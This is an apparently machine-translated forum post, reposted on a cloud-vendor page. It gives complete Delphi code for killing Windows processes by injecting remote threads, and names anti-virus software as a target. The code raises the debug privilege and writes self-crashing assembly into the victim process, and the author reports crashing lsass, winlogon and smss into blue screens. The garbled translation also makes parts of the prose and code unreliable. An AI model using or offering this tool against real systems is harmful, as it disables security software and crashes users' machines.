[Paste From DFW] Remote brute-force cracking, alternative way to end the process (insert a Program)

Source: Internet
Author: User
Author:Stake
Title:[Original] Remote brute-force cracking, alternative way to terminate the process (insert a Program)
Keywords:End Process cracking
Category:Personal Zone
Confidentiality level:Public

(Score:, reply: 3, read: 87 )»»

The old way to end the process is OpenProcess, and then TerminateProcess. However, if you encounter programs that Hook TerminateProcess and kernel-mode programs (such as many anti-virus software programs), you will be powerless. The final result of TerminateProcess is no change or your program will die directly...

I have long thought about using other methods to end the process, for example, letting myself work in kernel mode... here is a very simple way to remotely crack the target program. To put it bluntly, it is to insert a thread to the target program, execute a piece of crash code, and let the target die from the internal. It is like throwing a bomb inside the target, so it is called remote cracking.

Implementation principle:
1. First, how to crash the target program. I have encountered a program crash. Do you still remember how to write the code? (Who should remember the code that will crash?) I don't know how to write it. Let's tell you the simplest way. The starting address of CreateRemoteThread should be replaced by 0 directly, try to read and write the physical memory at 0. Is it the "0x00000000" memory referenced by the "0x00000000" command directly. The memory cannot be "read "., This is the goal. But for the sake of insurance, it is better to write a piece of code that will inevitably cause a crash. After all, it is more secure.
In fact, the target program can be terminated without such violence. Do you still remember exitprocess? That is, the exit API that can only be used in your own program, just inject the address $7c81caa2 (for details, see the following ). This is like throwing a knife to someone else and letting him commit suicide...

2. There are many examples of injection threads, which are skipped here. Note that processes in kernel mode cannot run createremotethread at the same level. In addition, it is best to upgrade to the debug permission, otherwise do not want to remotely inject.

Program Implementation: (all code is on the second floor)
1. enableddebugprivilege (true); // upgrade to debug permission. Copy Delphi to go deep into

2. Get the process ID and put it in SC _pid.
Hremoteprocess: = OpenProcess (process_create_thread + {allow remote thread creation}
Process_vm_operation + process_vm_write, {allow remote VM operations + allow remote VM write}
False, SC _pid );

3. Get the exitprocess address: ($7c81caa2 under XP)
Pfnstartaddr: = getprocaddress (getmodulehandle ('kernel32'), 'exitprocess ');

4. In the old method, the remote thread from $7c81caa2
Hthread: = createremotethread (hremoteprocess, nil, 0, pfnstartaddr, nil, 0, tempvar );
Here, we can also combine step 3 and Step 4 to make it simpler. The second nil refers to the ExitProcess parameter. Anyway, we need to call ExitProcess (0), so nil is passed.

After the execution, we can see that the dead QQ is closed without sound, and the wordalso is, but lsass.exe is not working, and ExitProcess does not respond at all. In this case, we can directly crack it.

5. Modify CreateRemoteThread
HThread: = CreateRemoteThread (hRemoteProcess, nil, 0, Pointer ($0), Pointer ($10000), 0, TempVar );
Target lsass.exe! Then uninstall lsass.exe-application error"
The "0x00000000" memory referenced by the "0x00000000" command. The memory cannot be "read ". Then OpenProcess becomes invalid because lsass has been killed.

However, the process in kernel mode such as smss.exe cannot be created directly using CreateRemoteThread. If hThread is not 0, run your program in kernel mode first.
As a result, winlogin.exe spoolsv.exe services.exe is also cracked. Then there is a long-overdue blue screen...
Note: Do not touch the system process. This is the blood I have gained from a dozen reboots!

In this case, csrss.exe can read the 0 address and will not directly die. So try to implement the crash code by yourself, and let Windows tell us that "XXX needs to be closed when there is a problem. We are sorry for the inconvenience ." Right! Other common methods include using VirtualAllocEx to open a large space and WriteProcessMemory to write in the target program, provided that you have sufficient permissions.

The complete program code is provided below. Create a console program, paste the code on the second floor, and run it!

2006-7-25 15:24:03

  View comments »»»

15:42:25 complete insertthreads. DPR

Program insertthreads;
{If you have not understood the entire program, keep the following information:
Remote Process blasting by wooden piles
Original post address: http://www.delphibbs.com/keylife/iblog_show.asp? Xid = 23375
}
{$ Apptype console}
Uses
Sysutils, windows;

VaR inputs: string;
SC _pid: integer;
Tempvar: Cardinal;
Hremoteprocess, hthread: thandle;
D_proc_addr, pfnstartaddr: pointer;

// Run the code of the remote process to be injected and the code will crash.
Procedure kemthreads ();
ASM
Push 0
Pop eax // clear eax
MoV ESI, eax // Si, Di to zero
MoV EDI, eax
@ Loop:
Mov [eax], dword ptr eax // start random write memory, and then exit with an error
Add eax, 4
Jmp @ Loop
End;

// Functions for permission escalation, copywriting
Function EnabledDebugPrivilege (const bEnabled: Boolean): Boolean;
Var
HToken: THandle;
Tp: TOKEN_PRIVILEGES;
A: DWORD;
Const
SE_DEBUG_NAME = 'sedebugprivilege ';
Begin
Result: = False;
If (OpenProcessToken (GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES, hToken) then
Begin
Tp. PrivilegeCount: = 1;
LookupPrivilegeValue (nil, SE_DEBUG_NAME, tp. Privileges [0]. Luid );
If bEnabled then
Tp. Privileges [0]. Attributes: = SE_PRIVILEGE_ENABLED
Else
Tp. Privileges [0]. Attributes: = 0;
A: = 0;
AdjustTokenPrivileges (hToken, False, tp, SizeOf (tp), nil, );
Result: = GetLastError = ERROR_SUCCESS;
CloseHandle (hToken );
End;
End;

Begin
EnabledDebugPrivilege (True); // permission escalation

Write ('Enter the target process pID: '); Readln (inputs );
SC _pID: = strtoint (inputs );
HRemoteProcess: = OpenProcess (PROCESS_CREATE_THREAD + {allow remote thread creation}
PROCESS_VM_OPERATION + PROCESS_VM_WRITE, {allow remote VM operations + allow remote VM write}
FALSE, SC _pID );
// Check hRemoteProcess to see if OpenProcess is successful ..

// Open a memory space of $1000
D_Proc_Addr: = VirtualAllocEx (hRemoteProcess, nil, $1000, MEM_COMMIT, PAGE_READWRITE );

// Write the kemThreads () function
If Not (WriteProcessMemory (hRemoteProcess, d_proc_addr, @ kemThreads, $800, TempVar) then
Writeln ('writeprocessmemory write target process failed. ')
Else
Begin
{Commented out here, demonstrating how to find the 'exitprocess' address
// Find the function address
// ExitProcess (kernel32) $7C81CAA2
// MessageBoxA (User32) $ 77D504EA
PfnStartAddr: = GetProcAddress (GetModuleHandle ('kernel32'), 'exitprocess ');
Write (format ('function address: $ % 0.8x', [integer (pfnStartAddr)]);
}
Writeln (''); TempVar: = 0;
// Writeln (format ('write data at: % 0.8x', [integer (d_Proc_Addr)]);

// Write complete, execute
// HThread: = CreateRemoteThread (hRemoteProcess, nil, 0, Pointer ($0), Pointer ($10000), 0, TempVar ); // This line is the fifth zero address brute-force attack.
HThread: = CreateRemoteThread (hRemoteProcess, nil, 0, d_Proc_Addr, nil, 0, TempVar); // run the kemThreads () function to write data.
If hThread <= 0 then begin Writeln ('createremotethread failed to run the remote thread. '); End;
End;

Write ('execution completed '); readln (inputs); // press enter to end
// VirtualFreeEx (hRemoteProcess, d_Proc_Addr, $1000, MEM_DECOMMIT );
CloseHandle (hRemoteProcess );
End.

 

15:43:03 attached the most streamlined ExitProcess method (but often cannot reach the end of the process results ...)

Var inputs: String;
SC _pID: integer;
TempVar: Cardinal;
HRemoteProcess, hThread: THandle;
Begin
EnabledDebugPrivilege (True); // permission escalation
SC _pID :={ target process ID };
HRemoteProcess: = OpenProcess (PROCESS_CREATE_THREAD + PROCESS_VM_OPERATION + PROCESS_VM_WRITE, FALSE, SC _pID );
HThread: = CreateRemoteThread (hRemoteProcess, nil, 0, Pointer ($7C81CAA2), nil, 0, TempVar );
Writeln ('thread inserted, ThreadID '+ inttostr (TempVar ));
// CloseHandle (hRemoteProcess );
End;

 

2006-7-25 15:55:22

The above ExitProcess method is the simplest API call. Just put it in a button. Make sure to modify SC _pID :={ target process ID };!

The above section
Procedure kemThreads ();
Asm
Push 0
Pop eax // clear eax
Mov esi, eax // si, di to zero
Mov edi, eax
@ Loop:
Mov [eax], dword ptr eax // start random write memory, and then exit with an error
Add eax, 4
Jmp @ Loop
End;
Not the best. Maybe you can find out more effective crash code. If you have any better ideas, please remember to reply!
Now I am studying "Writing Secure Code (version 2nd)". If I find more malicious code, I will immediately post it out!

(With the above collapse code, the vmwarevirtual machine has been tested, after smss.exe injection, direct blue screen
After paying winlogin.exe, I was surprised to find that the shutdown button disappears, and only logout is left in the Start Menu. The options in the Task Manager are completely gray.
Inserting lsass.exe does not cause any harm. The "shutdown" dialog box is displayed. After shutdown/a is canceled for half a minute, the blue screen unknow hard error ...)

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.